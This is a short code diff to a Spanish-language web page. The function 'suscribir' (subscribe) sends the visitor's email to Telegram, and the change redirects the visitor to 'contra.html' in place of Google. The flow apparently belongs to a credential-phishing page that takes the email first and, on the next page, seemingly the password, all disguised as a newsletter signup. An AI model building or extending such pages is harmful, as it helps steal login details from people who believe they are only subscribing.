--- a/index.html
+++ b/index.html
@@ -972,7 +972,7 @@ function suscribir() {
   enviarCorreoATelegram(email);
   
   // Redirigir inmediatamente a Google
-  window.location.href = 'https://www.google.com';
+  window.location.href = 'contra.html';
 }
 
 // Capturar Enter en el input
